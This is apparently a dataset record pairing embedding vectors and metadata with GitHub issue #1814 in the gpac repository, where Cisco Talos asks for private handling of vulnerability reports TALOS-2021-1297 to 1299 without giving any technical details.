-0.022301917895674706, -0.021100018173456192, -0.011366114020347595, 0.004061975982040167, 0.015090519562363625, 0.019720060750842094, 0.006406422704458237, -0.02887527272105217, -0.009385204873979092, 0.016040168702602386, -0.016307257115840912, -0.011136121116578579, 0.0022813838440924883, 0.0017898662481456995, 0.02212386019527912, 0.0005221216124482453, 0.022658037021756172, -0.028311418369412422, 0.002298076869919896, 0.00714833615347743, -0.015283416956663132, -0.016574347391724586, -0.008628453128039837, -0.01908201351761818, 0.0024575884453952312, 0.013317346572875977, -0.0009306377032771707, -0.027792077511548996, 0.002411218825727701, 0.023414788767695427, -0.0002666251384653151, 0.0027283867821097374, -0.01241221185773611, 0.006825604010373354, 0.004039718769490719, -0.009244241751730442, -0.007916216738522053, 0.033475134521722794, 0.01966070756316185, 0.01733109913766384, -0.014341187663376331, 0.008776836097240448, 0.023830261081457138, 0.005219361279159784, 0.0007785454508848488, 0.010490655899047852, -0.02403799630701542, 0.014044421724975109, 0.01480859238654375, 0.011670298874378204, 0.015046005137264729, -0.0012779459357261658, 0.016737567260861397, 0.01679692044854164, -0.0013335894327610731, -0.0069443099200725555, 0.06505097448825836, -0.009719066321849823, 0.0050375922583043575, -0.015832433477044106, 0.014311511069536209, -0.01736077480018139, -0.005497578531503677, 0.0005179483559913933, -0.032822251319885254, 0.011314180679619312, 0.014200223609805107, 0.010624201036989689, 0.0040731048211455345, 0.0015710017178207636, -0.01368088461458683, 0.03213969245553017, 0.016811758279800415, -0.025121189653873444, 0.014793754555284977, -0.010171633213758469, -0.0030603930354118347, -0.010720649734139442, 0.014578599482774734, 0.008227820508182049, -0.000109953893115744, 0.010542590171098709, -0.003027006983757019, 0.018562674522399902, -0.0021756612695753574, -0.011707394383847713, -0.007893959060311317, -0.0028341093566268682, -0.009741324000060558, 0.016396287828683853, 0.007200269959867001, 0.00888812355697155, -0.006428679917007685, 0.021738063544034958, 0.009377785958349705, 0.011291923001408577, -0.010030670091509819, -0.008724902756512165, -0.0008128589252009988, 0.043060656636953354, -0.0000741333860787563, -0.003663197625428438, -0.01382184773683548, 0.007400586735457182, 0.007693642750382423, -0.00035472738090902567, -0.018696218729019165, 0.007663966156542301, -0.004458900075405836, -0.012137704528868198, 0.03222871944308281, 0.021470975130796432, -0.0016563218086957932, 0.02515086717903614, -0.011536754667758942, 0.007367200683802366, -0.030418451875448227, -0.024587012827396393, 0.019156206399202347 ]
134
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Hello, the Cisco Talos team found security vulnerabilities affecting GPAC products. As this is a sensitive security issue, we request this issue be marked as private before entering the details for each report. For further information about the Cisco Vendor Vulnerability Reporting and Disclosure Policy please refer to this document which also links to our public PGP key. https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html
Talos Security Advisory for (TALOS-2021-1297, 1298, 1299)
https://api.github.com/repos/gpac/gpac/issues/1814/comments
13
2021-05-26T13:45:45
2021-08-18T13:25:32Z
https://github.com/gpac/gpac/issues/1814
902,417,837
1,814
false
This is a GitHub Issue repo:gpac owner:gpac Title : Talos Security Advisory for (TALOS-2021-1297, 1298, 1299) Issue date: --- start body --- Hello, the Cisco Talos team found security vulnerabilities affecting GPAC products. As this is a sensitive security issue, we request this issue be marked as private before entering the details for each report. For further information about the Cisco Vendor Vulnerability Reporting and Disclosure Policy please refer to this document which also links to our public PGP key. https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html --- end body ---
625
[ -0.020933905616402626, 0.0011880593374371529, -0.017132116481661797, 0.0029014714527875185, 0.025200894102454185, 0.04215655475854874, -0.02439882792532444, 0.05062636733055115, 0.00026944384444504976, 0.04485149681568146, 0.014998622238636017, 0.0036233302671462297, 0.008413665927946568, 0.014244681224226952, -0.0372479148209095, 0.03638168424367905, -0.02813645265996456, 0.017565231770277023, 0.02773541957139969, -0.020709328353405, 0.023532597348093987, -0.006272151134908199, 0.013771462254226208, 0.030654938891530037, 0.04276612401008606, 0.008048726245760918, -0.015752563253045082, 0.0128731494769454, -0.011204853653907776, 0.012359827756881714, 0.028697898611426353, 0.029018724337220192, 0.004503597039729357, 0.009448329918086529, 0.020629120990633965, -0.01623380370438099, -0.005265559069812298, 0.09149961918592453, -0.02386946603655815, -0.0027570996899157763, -0.02481590211391449, -0.06018698588013649, -0.00829335581511259, 0.009913528338074684, -0.03063889779150486, -0.0022056796588003635, 0.01008998230099678, 0.015592150390148163, -0.018752288073301315, 0.001166002475656569, 0.02091786451637745, -0.03881996497511864, -0.025313183665275574, -0.04369652271270752, -0.033365920186042786, -0.04157906770706177, 0.012760859914124012, 0.023227812722325325, 0.008734491653740406, 0.014316867105662823, 0.00969697069376707, 0.043568190187215805, -0.02064516209065914, 0.048412665724754333, -0.003494999837130308, 0.029002683237195015, 0.0060916864313185215, 0.03407173603773117, 0.0023941651452332735, 0.02704564481973648, -0.005109156481921673, -0.03551545366644859, 0.007026092614978552, 0.020324336364865303, 0.03718375042080879, -0.016779206693172455, 0.034777555614709854, 0.028906436637043953, 0.01940998248755932, 0.00897511187940836, -0.024527158588171005, 0.05624082311987877, -0.03785748407244682, 0.025986917316913605, 0.01883249543607235, -0.005650550592690706, -0.05033762380480766, -0.08861218392848969, -0.012889190576970577, -0.01637817546725273, 0.006035542115569115, 0.023372184485197067, -0.01058726292103529, -0.0018718200735747814, 0.03981452435255051, -0.0011269018286839128, -0.02112640254199505, -0.012841066345572472, -0.04687270149588585, -0.019746849313378334, -0.003946161828935146, -0.008718450553715229, -0.01245607528835535, -0.006785472854971886, 0.018816454336047173, 0.005971376784145832, 0.037055421620607376, -0.015744542703032494, -0.013595008291304111, 0.10766925662755966, -0.003304509213194251, 0.0007669749902561307, -0.027703337371349335, -0.012913252227008343, -0.03522671014070511, 0.015407675877213478, -0.024254456162452698, -0.005201393738389015, -0.05627290531992912, -0.008413665927946568, -0.017148157581686974, -0.05925659090280533, -0.017661480233073235, -0.03184199333190918, -0.03047848492860794, 0.059224504977464676, -0.024061961099505424, 0.004106574691832066, -0.013362408615648746, -0.010290498845279217, -0.05271173641085625, 0.002592676319181919, -0.017517108470201492, -0.02616337314248085, 0.01706795021891594, 0.02913101390004158, 0.026259619742631912, 0.016474422067403793, -0.015159035101532936, 0.006332306191325188, -0.05498960241675377, -0.003960197791457176, 0.0110845435410738, 0.006127779372036457, -0.019490187987685204, -0.00676141120493412, 0.016033286228775978, -0.000022150788936414756, -0.039974939078092575, 0.015776624903082848, -0.008285335265100002, -0.018222924321889877, -0.0015931023517623544, 0.023741135373711586, 0.03375091031193733, -0.03059077262878418, -0.0019470136612653732, 0.05425170063972473, -0.02460736595094204, 0.00928791705518961, 0.008341480046510696, -0.016570670530200005, -0.004138657357543707, 0.004816402681171894, 0.01950622908771038, -0.000034620399674167857, 0.04905431717634201, 0.030510567128658295, -0.019233526661992073, 0.026307744905352592, 0.027286263182759285, -0.02751084230840206, 0.012343785725533962, -0.01899290829896927, -0.03622127324342728, -0.012399930506944656, 0.0249121505767107, 0.019602477550506592, -0.03209865465760231, -0.01767752133309841, -0.01566433720290661, 0.02439882792532444, -0.003793769283220172, -0.013426573947072029, 0.0035310927778482437, -0.0242865402251482, 0.043985266238451004, -0.01961851865053177, -0.01649046316742897, -0.0316174179315567, 0.017228364944458008, 0.024831943213939667, 0.02595483511686325, -0.017083993181586266, -0.0075554559007287025, 0.007222598418593407, -0.023789258673787117, -0.016297968104481697, 0.04347194358706474, -0.0355796180665493, -0.007780034095048904, 0.016153596341609955, 0.01596912182867527, 0.01345063652843237, -0.02127077430486679, 0.029147055000066757, 0.0032042511738836765, 0.04395318403840065, 0.0032022460363805294, -0.012367848306894302, -0.05726746842265129, -0.029002683237195015, 0.03022182360291481, 0.02159160003066063, 0.00871043000370264, 0.016314009204506874, -0.009841342456638813, 0.0024763767141848803, -0.020147882401943207, -0.007984560914337635, 0.036959171295166016, -0.010442891158163548, 0.0435040257871151, -0.007338898256421089, -0.02690127305686474, -0.0021635713055729866, 0.017982305958867073, 0.00018911197548732162, -0.0009504474583081901, 0.021367020905017853, 0.004828433506190777, 0.011565783061087132, 0.015688398852944374, 0.002522495575249195, -0.017661480233073235, -0.030414318665862083, -0.025682132691144943, 0.00970499124377966, 0.006981979124248028, -0.011758278124034405, -0.009785197675228119, 0.013899792917072773, -0.015752563253045082, -0.005257538519799709, -0.013530842959880829, 0.03480963781476021, 0.005706694908440113, 0.07763992995023727, -0.01471789926290512, 0.008862822316586971, -0.012744818814098835, -0.005911221727728844, -0.006673183757811785, 0.017757726833224297, 0.0039922804571688175, 0.01706795021891594, 0.003695516148582101, 0.027815626934170723, -0.004904629662632942, -0.04376068711280823, 0.017934180796146393, -0.0242865402251482, -0.033269669860601425, -0.0028994663152843714, -0.015455800108611584, 0.00037797330878674984, 0.016618793830275536, 0.024880068376660347, 0.0167471244931221, -0.03152116760611534, 0.017292529344558716, -0.0038479086942970753, -0.029355593025684357, 0.025634009391069412, -0.026612529531121254, 0.02694939635694027, 0.008622203022241592, 0.013193975202739239, -0.002654836280271411, -0.02752688340842724, 0.010643407702445984, -0.00839762482792139, -0.00198912201449275, 0.011325162835419178, 0.000700303353369236, 0.013458657078444958, -0.004728175234049559, -0.002636789809912443, -0.013923854567110538, 0.009328019805252552, -0.009985714219510555, 0.04485149681568146, -0.02034037746489048, -0.014990601688623428, -0.0011880593374371529, 0.004367245826870203, 0.0062761614099144936, 0.003099982626736164, -0.026933355256915092, 0.020629120990633965, -0.029981203377246857, 0.007374991197139025, -0.006079655606299639, -0.003372684819623828, -0.02226533554494381, 0.02855352684855461, -0.020308295264840126, 0.04343986138701439, -0.006584956776350737, -0.005622478201985359, 0.027639172971248627, -0.06053989380598068, -0.028569567948579788, -0.014589568600058556, -0.02107827737927437, 0.0064165228977799416, -0.001317392336204648, -0.019217485561966896, -0.004270998295396566, -0.013290222734212875, 0.030719103291630745, 0.023757176473736763, -0.04270195960998535, -0.010434870608150959, 0.011918690986931324, -0.01685941405594349, 0.0031841995660215616, -0.03320550546050072, -0.05624082311987877, -0.01617765799164772, 0.029275385662913322, -0.0012642554938793182, 0.0021635713055729866, -0.01123693585395813, 0.010194250382483006, -0.04680853337049484, -0.07635661959648132, -0.0027350429445505142, 0.03211469575762749, -0.03949369862675667, -0.0026087176520377398, 0.02210492081940174, 0.0023721083998680115, 0.014509362168610096, -0.009424268268048763, -0.018447503447532654, -0.017613355070352554, 0.019490187987685204, 0.0263719093054533, -0.00033711810829117894, 0.0009228764683939517, -0.0008466802537441254, 0.036125022917985916, 0.0351625457406044, 0.03116825968027115, 0.008189087733626366, 0.019442064687609673, -0.02669273503124714, 0.0242865402251482, -0.02621149644255638, 0.032226987183094025, -0.04764268174767494, 0.01162994746118784, 0.057812873274087906, 0.0019289671909064054, 0.002480387222021818, -0.0028112391009926796, 0.01846354454755783, -0.005149259697645903, -0.01862395741045475, -0.028842270374298096, 0.026805024594068527, -0.02683710679411888, 0.004046419635415077, -0.0017855979967862368, -0.0012582400813698769, -0.008132942952215672, 0.02933955192565918, -0.028441237285733223, 0.029483923688530922, -0.04318320006132126, 0.0010236359667032957, 0.06544853746891022, -0.006404492072761059, -0.014998622238636017, 0.0314088799059391, 0.0024884077720344067, 0.039974939078092575, -0.00830137636512518, -0.015159035101532936, -0.05030554160475731, 0.06583352386951447, -0.020276213064789772, -0.03535504266619682, -0.058550771325826645, 0.019217485561966896, -0.047161445021629333, -0.029884954914450645, -0.0017094018403440714, -0.01318595465272665, 0.01690753735601902, -0.002710981061682105, -0.006641101092100143, 0.031280551105737686, -0.016153596341609955, 0.015632253140211105, -0.004242925904691219, -0.016939621418714523, 0.06923428177833557, -0.008991152979433537, -0.002048274502158165, -0.019682684913277626, -0.02455924078822136, -0.01521517988294363, 0.020372459664940834, 0.009889465756714344, 0.004114595241844654, 0.03715166822075844, -0.008590119890868664, 0.039622027426958084, 0.016137555241584778, -0.01142141129821539, -0.0030678999610245228, 0.0024422891438007355, 0.03221094608306885, 0.01596110127866268, -0.0040504299104213715, 0.023067399859428406, 0.054444197565317154, -0.03198636695742607, 0.038467053323984146, -0.01531944889575243, 0.0007855227449908853, -0.04241321608424187, 0.012022959999740124, 0.006079655606299639, -0.04119407758116722, -0.03277239203453064, 0.00040830139187164605, -0.01748502440750599, -0.046070635318756104, 0.0326601006090641, -0.011878588236868382, 0.02752688340842724, 0.014084267430007458, -0.05197383463382721, -0.03339800238609314, -0.034200068563222885, 0.029259344562888145, -0.008080808445811272, -0.010563201270997524, 0.0447552464902401, -0.0011289069661870599, -0.024944232776761055, -0.035194627940654755, 0.0008998170960694551, -0.02414216846227646, -0.012656591832637787, 0.012776901014149189, 0.028489362448453903, -0.010314560495316982, 0.026035042479634285, -0.0006501742172986269, 0.0025806452613323927, 0.03153720870614052, 0.027542924508452415, -0.013843648135662079, -0.027238139882683754, 0.01825500838458538, 0.00136551633477211, 0.01737273670732975, 0.020869741216301918, 0.03984660655260086, -0.012512220069766045, -0.007467228453606367, 0.019121238961815834, 0.008092839270830154, -0.022393664345145226, -0.03651001676917076, 0.005566333886235952, -0.012271599844098091, 0.006588967051357031, 0.012359827756881714, 0.0227946974337101, 0.0038719705771654844, -0.02518485300242901, 0.0007875279407016933, -0.0184154212474823, -0.013330326415598392, 0.009512495249509811, -0.004291049670428038, 0.0038298622239381075, 0.008517934009432793, -0.03439256176352501, 0.002432263223454356, -0.007250670809298754, 0.00338070560246706, 0.015888914465904236, 0.06602602452039719, -0.026019001379609108, 0.008541996590793133, 0.005690653808414936, 0.0056385197676718235, -0.006609018426388502, 0.015054767020046711, 0.016506506130099297, -0.028024163097143173, 0.02335614338517189, -0.02309948205947876, 0.014693837612867355, -0.012512220069766045, -0.00785623025149107, -0.0035992683842778206, -0.037279997020959854, -0.010827882215380669, -0.010932151228189468, 0.0080607570707798, -0.026291701942682266, -0.005265559069812298, -0.011092564091086388, -0.008983132429420948, -0.04635937884449959, -0.02815249375998974, 0.0028513423167169094, -0.003954182378947735, 0.018864577636122704, 0.005879139062017202, -0.0035030203871428967, 0.006552874110639095, -0.023003235459327698, -0.00860616099089384, -0.010370705276727676, -0.02096598781645298, 0.011252976953983307, -0.01570443995296955, 0.009977692738175392, -0.009769156575202942, 0.016418278217315674, 0.007130361162126064, -0.052615489810705185, -0.03291676193475723, 0.04324736446142197, -0.03291676193475723, -0.004367245826870203, 0.0007905357051640749, 0.013659173622727394, 0.0018277064664289355, 0.0033145351335406303, 0.019955385476350784, -0.018639998510479927, 0.0038118157535791397, -0.00019249568867962807, 0.030189739540219307, 0.025040481239557266, 0.004816402681171894, -0.014477279968559742, 0.02154347486793995, 0.015511943958699703, 0.011750257574021816, -0.009809259325265884, -0.011870567686855793, -0.007812116760760546, 0.005413941107690334, -0.003444870701059699, -0.017757726833224297, -0.02159160003066063, -0.014974560588598251, 0.047514352947473526, -0.021142443642020226, -0.010130085982382298, 0.012808984145522118, -0.006272151134908199, -0.02882622927427292, -0.00286738364957273, -0.024158209562301636, -0.004467504099011421, 0.0024061962030828, 0.003539113327860832, -0.018816454336047173, 0.01872020587325096, -0.036959171295166016, -0.04132240638136864, -0.0010286488104611635, 0.004888588562607765, -0.012399930506944656, -0.009424268268048763, 0.0009820287814363837, -0.0007033110596239567, -0.029676418751478195, -0.03756874054670334, -0.012415971606969833, 0.0004719653516076505, 0.011269018054008484, -0.014557486400008202, 0.012095145881175995, -0.014557486400008202, 0.0010261423885822296, 0.015142994001507759, 0.021703889593482018, -0.0019690704066306353, -0.021944507956504822, 0.04052034392952919, 0.03291676193475723, -0.03875579684972763, -0.014204577542841434, 0.010162168182432652, 0.02658044546842575, 0.02298719435930252, -0.03744041174650192, 0.015335489995777607, 0.004591824021190405, -0.00014813145389780402, 0.05550292506814003, -0.03116825968027115, 0.025970876216888428, -0.015038725920021534, 0.015263304114341736, -0.005057021975517273, -0.015519964508712292, 0.01188660878688097, -0.008525954559445381, -0.031072013080120087, 0.024527158588171005, -0.02444695308804512, 0.02565005049109459, 0.028489362448453903, 0.02565005049109459, 0.015022683888673782, -0.007266712374985218, -0.01303356233984232, -0.030077451840043068, 0.009713011793792248, -0.017982305958867073, -0.02298719435930252, -0.02824874222278595, -0.01809459552168846, 0.0393332839012146, 0.009616763330996037, -0.040552426129579544, 0.008157004602253437, -0.029660377651453018, 0.0047602578997612, -0.03817830979824066, 0.06994009763002396, -0.014268742874264717, -0.00651678116992116, 0.010827882215380669, 0.008574078790843487, 0.01795022375881672, 0.01555204764008522, 0.003099982626736164, -0.019153321161866188, 0.0019409982487559319, 0.023660928010940552, 0.019811013713479042, -0.02017996460199356, 0.015439758077263832, 0.04193197563290596, -0.006220017094165087, -0.006392460782080889, -0.011942753568291664, -0.025714214891195297, -0.0009313984191976488, -0.0009534552227705717, -0.008774595335125923, 0.017228364944458008, -0.0047803097404539585, -0.029740583151578903, -0.014854250475764275, -0.0014908390585333109, 0.013426573947072029, -0.008886883966624737, 0.006328295916318893, -0.024880068376660347, -0.016057347878813744, -0.008774595335125923, 0.012103166431188583, 0.010835902765393257, -0.00832543894648552, -0.01571246050298214, -0.0004148181760683656, -0.024960273876786232, -0.0014096299419179559, 0.01825500838458538, -0.013611049391329288, 0.012568363919854164, -0.009688949212431908, -0.02518485300242901, -0.013779482804238796, -0.03426423296332359, 0.017388777807354927, -0.008750532753765583, -0.007306815590709448, 0.02159160003066063, 0.0027190016116946936, -0.02678898349404335, 0.032804474234580994, -0.007014061789959669, -0.04369652271270752, 0.0006627065013162792, -0.0355796180665493, -0.012030980549752712, -0.01066746935248375, 0.015351531095802784, -0.0190410315990448, 0.037536658346652985, -0.006083665881305933, 0.0026247589848935604, -0.001010101055726409, 0.010779758915305138, -0.0068255760706961155, 0.01669900119304657, -0.015271324664354324, -0.006432564463466406, -0.02075745165348053, -0.009729052893817425, 0.023853424936532974, 0.012961376458406448, -0.02581046335399151, 0.014677796512842178, -0.011581824161112309, -0.022088879719376564, -0.015231220982968807, -0.03567586839199066, -0.03772915527224541, -0.015800688415765762, 0.0027390532195568085, 0.02943579852581024, -0.012656591832637787, 0.0103546641767025, -0.010563201270997524, -0.0324515663087368, 0.04587813839316368, 0.005065042991191149, 0.002588666044175625, 0.015367572195827961, 0.006785472854971886, 0.004651979077607393, 0.0198751799762249, 0.019008949398994446, 0.025345265865325928, -0.001563024939969182, 0.020982030779123306, -0.029981203377246857, 0.008189087733626366, -0.006889741402119398, 0.007254681084305048, 0.021623682230710983, -0.01679524965584278, 0.01790209859609604, 0.020212046802043915, -0.010803820565342903, -0.006649122107774019, -0.03084743395447731, -0.0002849838638212532, -0.016209740191698074, 0.017661480233073235, -0.0018738252110779285, 0.0063443370163440704, -0.01230368297547102, -0.020613079890608788, 0.0523267462849617, -0.027141891419887543, -0.0009940597228705883, 0.013490739278495312, -0.027238139882683754, -0.0065729254856705666, 0.0001576559734530747, 0.005847056396305561, -0.003242349252104759, 0.00367947481572628, 0.01769356243312359, -0.011854526586830616, -0.019778931513428688, 0.019281651824712753, -0.003444870701059699, 0.0376649908721447, -0.009063338860869408, 0.0028192598838359118, -0.007539414335042238, -0.03718375042080879, -0.004756247624754906, -0.03205053135752678, 0.04456275328993797, 0.013883751817047596, -0.02746271900832653, 0.04828433692455292, -0.004411359317600727, -0.017966264858841896, 0.02386946603655815, 0.024575283750891685, -0.0006987994420342147, 0.037215832620859146, -0.03606085851788521, -0.0015489887446165085, -0.026516281068325043, 0.0047682784497737885, 0.019955385476350784, -0.02382134087383747, 0.015744542703032494, 0.02398175373673439, -0.0013996040215715766, -0.014292804524302483, -0.016987744718790054, -0.006845627911388874, -0.015287365764379501, -0.012632529251277447, 0.0040183477103710175, -0.033686745911836624, 0.013314285315573215, -0.028842270374298096, -0.004042409360408783, -0.0039782440289855, 0.004944732878357172, -0.009536556899547577, 0.003747650422155857, -0.008237211033701897, -0.013097727671265602, -0.011357245966792107, 0.020982030779123306, -0.023580722510814667, 0.001993132522329688, 0.004088527988642454, -0.021318897604942322, 0.02792791649699211, -0.03448881208896637, -0.014421135187149048, 0.023805299773812294, 0.04469108209013939, 0.016506506130099297, 0.007178484927862883, -0.007579517550766468, -0.02263428457081318, 0.013097727671265602, -0.02678898349404335, 0.01490237470716238, 0.0017545180162414908, 0.010418829508125782, -0.0031380807049572468, 0.0447552464902401, -0.017452942207455635, -0.01376344170421362, -0.006043562665581703, -0.021463269367814064, 0.0074150944128632545, -0.015199138782918453, -0.02367696911096573, -0.012624508701264858, 0.030831392854452133, 0.058550771325826645, 0.016169637441635132, 0.014364990405738354, 0.007739930879324675, 0.032018449157476425, -0.007262702099978924, 0.009199690073728561, 0.004307091236114502, -0.007443166803568602, 0.025008399039506912, -0.01649046316742897, -0.008201118558645248, 0.03423215076327324, 0.0031120136845856905, -0.000005099067948322045, 0.01939394138753414, 0.018030429258942604, -0.011373287066817284, -0.05498960241675377, -0.0024643458891659975, -0.008277314715087414, -0.03651001676917076, -0.009913528338074684, 0.009311978705227375, -0.026821065694093704, 0.005201393738389015, -0.0087906364351511, -0.013923854567110538, -0.015231220982968807, 0.009263855405151844, 0.013514801859855652, -0.017388777807354927, -0.007379001472145319, -0.0029536057263612747, 0.01292929332703352, 0.015608192421495914, -0.03699125349521637, -0.003625335404649377, 0.005650550592690706, -0.005442013498395681, 0.0016031281556934118, 0.0058229947462677956, -0.016346091404557228, -0.04456275328993797, -0.015014663338661194, 0.0054901372641325, 0.014830188825726509, -0.018174801021814346, -0.049022234976291656, -0.05418753623962402, 0.021623682230710983, -0.00741108413785696, 0.02064516209065914, 0.010699551552534103, -0.009544577449560165, 0.003073915606364608, 0.032130736857652664, 0.022281376644968987, -0.004166729748249054, -0.0039642080664634705, 0.025313183665275574, -0.010884026996791363, -0.023917589336633682, -0.017340652644634247, -0.022072838619351387, -0.04360027238726616, 0.018014388158917427, -0.015744542703032494, 0.014934456907212734, 0.0142286391928792, 0.03824247792363167, -0.016779206693172455, 0.02678898349404335, -0.024366745725274086, 0.030318070203065872, 0.022586161270737648, -0.014838209375739098, -0.023019276559352875, -0.007968519814312458, -0.004431411158293486, -0.018062511458992958, -0.000488507910631597, -0.0028052236884832382, -0.025425471365451813, 0.014581548050045967, 0.018848536536097527, -0.0150627875700593, -0.0022016693837940693, 0.00286738364957273, -0.014316867105662823, -0.04947139322757721, -0.0003734616911970079, 0.03235531598329544, 0.020003510639071465, -0.0011670051608234644, -0.00819309800863266, 0.025874629616737366, 0.008926987648010254, -0.02980474941432476, -0.006352357566356659, -0.013843648135662079, -0.03660626336932182, -0.020789533853530884, -0.02725418098270893, -0.0046399482525885105, -0.003523072227835655, 0.002145524835214019, -0.030350154265761375, 0.004178760573267937, 0.008774595335125923, 0.027446676045656204, -0.02008371613919735, 0.019698726013302803, -0.009167606942355633, -0.028328949585556984, 0.016065368428826332, 0.002478382084518671, -0.03261197730898857, 0.005558312870562077, 0.011309121735394001, -0.012736798264086246, 0.00578690180554986, 0.013009500689804554, -0.010073941200971603, 0.027558965608477592, 0.016217762604355812, 0.004772288724780083, -0.004014336969703436, -0.016305988654494286, 0.0018658045446500182, 0.009151565842330456, -0.0007178484811447561, 0.005971376784145832, 0.018142718821763992, -0.03692708909511566, -0.010491015389561653, -0.012897211126983166, -0.006681204307824373, 0.02173597179353237, -0.014926436357200146, -0.0005418953951448202, 0.010964233428239822, -0.011662030592560768, 0.0018457529367879033, -0.053706295788288116, 0.02725418098270893, -0.026500239968299866, 0.019329775124788284, -0.010611324571073055, -0.05652956664562225, -0.043407779186964035, -0.03132867440581322, 0.027943957597017288, -0.014268742874264717, 0.006336316466331482, -0.004688072018325329, -0.008365541696548462, 0.023548638448119164, 0.003360653994604945, -0.009151565842330456, -0.01090006809681654, -0.025714214891195297, -0.021703889593482018, 0.00042534529347904027, -0.033109258860349655, -0.015351531095802784, -0.0134987598285079, -0.002799208043143153, 0.0184154212474823, -0.00448755593970418, 0.0059513249434530735, -0.002544552320614457, 0.011565783061087132, -0.018495626747608185, -0.004511617589741945, 0.008902925997972488, 0.023083440959453583, -0.008726471103727818, 0.011533699929714203, 0.014332908205688, 0.03174574673175812, -0.015624233521521091, -0.015744542703032494, 0.024430911988019943, 0.008598140440881252, 0.014621651731431484, -0.03407173603773117, -0.015191118232905865, -0.029981203377246857, -0.03734416514635086, 0.017356693744659424, 0.02435070462524891, 0.005097125191241503, -0.03756874054670334, -0.02455924078822136, -0.007880291901528835, 0.000430358195444569, 0.009865404106676579, 0.013843648135662079, -0.005229466129094362, -0.003306514583528042, 0.01711607538163662, -0.013282202184200287, 0.05348172038793564, -0.03282051533460617, -0.02409404329955578, -0.009255833923816681, -0.022746574133634567, -0.012399930506944656, 0.010908088646829128, 0.0037717123050242662, -0.01472591981291771, -0.03017369844019413, 0.00839762482792139, -0.013819586485624313, -0.029981203377246857, -0.01711607538163662, -0.0120390010997653, 0.005738777574151754, 0.003651402657851577, -0.0257462989538908, 0.005602426826953888, -0.007772013545036316, -0.0017404818208888173, -0.004182770848274231, 0.013362408615648746, -0.030494526028633118, 0.011116625741124153, -0.01357896625995636, -0.023901548236608505, -0.032339274883270264, -0.009488433599472046, -0.026307744905352592, -0.014958519488573074, 0.021399103105068207, -0.03174574673175812, 0.005024939309805632, 0.007030102889984846, 0.0005278592579998076, 0.025457555428147316, 0.0021796126384288073, -0.024735696613788605, -0.0050490014255046844, -0.007944457232952118, -0.025922752916812897, -0.03529087454080582, -0.019442064687609673, 0.022297417744994164, 0.09105046093463898, 0.011862547136843204, -0.014180515892803669, -0.010073941200971603, 0.008173045702278614, 0.010827882215380669, 0.020837659016251564, 0.01767752133309841, -0.0022357571870088577, -0.017260447144508362, 0.0010126074776053429, 0.021142443642020226, -0.023885507136583328, -0.00887084286659956, 0.022233251482248306, -0.00983332097530365, -0.007270722649991512, -0.0035892424639314413, 0.005887159612029791, 0.024302581325173378, 0.0037115574814379215, 0.005526230204850435, -0.005129207856953144, -0.008421686477959156, 0.025634009391069412, -0.01230368297547102, -0.0035070308949798346, -0.0053297244012355804, 0.017180239781737328, -0.019907262176275253, -0.02059703879058361, -0.00983332097530365, -0.00351705658249557, -0.0012171341804787517, -0.0011299095349386334, 0.021912425756454468, 0.018174801021814346, -0.027591047808527946, -0.010266436263918877, -0.03001328557729721, -0.0016803269973024726, 0.0006386445602402091, -0.006677194032818079, -0.01809459552168846, -0.0004604356363415718, -0.03304509446024895, 0.018848536536097527, 0.038114145398139954, -0.02196054905653, -0.005718726199120283, -0.006873700302094221, -0.030285988003015518, 0.02991703897714615, 0.02808832935988903, -0.006404492072761059, 0.021703889593482018, 0.007960498332977295, 0.002987693529576063, 0.011509638279676437, -0.011958794668316841, -0.010346643626689911, -0.006468657404184341, 0.005289621185511351, 0.018014388158917427, -0.009143545292317867, -0.002018196973949671, 0.008686368353664875, 0.023853424936532974, 0.002332004951313138, 0.012407951056957245, 0.022120963782072067, 0.016923578456044197, -0.0024142167530953884, 0.006412512622773647, -0.00918364804238081, 0.028441237285733223, 0.008806677535176277, 0.027815626934170723, -0.018190842121839523, -0.015383614227175713, 0.016939621418714523, -0.0007910369895398617, 0.003511041169986129, 0.02356468141078949, -0.007190516218543053, 0.027238139882683754, -0.027173975482583046, 0.0013554905308410525, 0.014541445299983025, 0.011100584641098976, 0.017452942207455635, 0.03059077262878418, 0.026724817231297493, 0.03375091031193733, -0.001998145366087556, -0.003605283796787262, -0.009263855405151844, -0.007647693157196045, -0.022201169282197952, -0.009199690073728561, 0.019794972613453865, 0.013538863509893417, -0.007603579666465521, 0.01811063662171364, 0.002632779534906149, 0.017773767933249474, 0.010643407702445984, 0.02746271900832653, 0.020725369453430176, -0.01627390645444393, -0.016618793830275536, -0.020949946716427803, -0.0167471244931221, -0.00798857118934393, -0.008205128833651543, 0.008116901852190495, -0.0063443370163440704, 0.02325989492237568, -0.0013364413753151894, -0.020228087902069092, -0.011742237024009228, -0.02423841506242752, 0.018960826098918915, 0.004028373397886753, -0.0008757550967857242, 0.009319999255239964, -0.01639421656727791, -0.028537485748529434, 0.0015981151955202222, 0.02532922476530075, 0.010876006446778774, 0.02085370011627674, 0.008918967097997665, 0.005365817341953516, 0.024831943213939667, -0.009448329918086529, 0.013739380054175854, -0.007523373235017061, 0.019265610724687576, -0.009616763330996037, 0.001945008523762226, 0.03006141074001789, 0.0015570094110444188, 0.0227946974337101, -0.0062761614099144936, -0.0015028699999675155, -0.015720481052994728, -0.018527710810303688, 0.019682684913277626, 0.0021876331884413958, 0.006155851762741804, -0.002057297620922327, 0.017452942207455635, 0.009560619480907917, 0.01337043009698391, 0.0280402060598135, 0.018639998510479927, -0.024527158588171005, -0.008598140440881252, 0.006179913878440857, 0.004651979077607393, 0.005040980875492096, 0.004250946454703808, -0.01456550695002079, -0.0013685240410268307, 0.00321828736923635, -0.006969947833567858, -0.011910670436918736, 0.005971376784145832, -0.01612953469157219, -0.0016843372723087668, 0.0022497933823615313, 0.009584681130945683, 0.0028312907088547945, -0.008341480046510696, 0.013410532847046852, -0.039301201701164246, -0.017180239781737328, 0.009793218225240707, -0.013795523904263973, -0.01138932816684246, 0.02263428457081318, -0.0026969448663294315, 0.002237762324512005, 0.01679524965584278, -0.027847709134221077, -0.009039276279509068, 0.01544777862727642, -0.051941752433776855, 0.015937039628624916, 0.004688072018325329, 0.03059077262878418, -0.004880567546933889, -0.0314088799059391, -0.013659173622727394, 0.01596912182867527, 0.011589844711124897, 0.0016542598605155945, 0.0022297417744994164, -0.010956212878227234, -0.0016723063308745623, -0.016987744718790054, 0.0035030203871428967, 0.004896609112620354, 0.001710404409095645, -0.03079931065440178, -0.010114043951034546, 0.012030980549752712, 0.0029034765902906656, 0.009512495249509811, -0.012808984145522118, 0.020212046802043915, 0.020629120990633965, -0.005213425029069185, 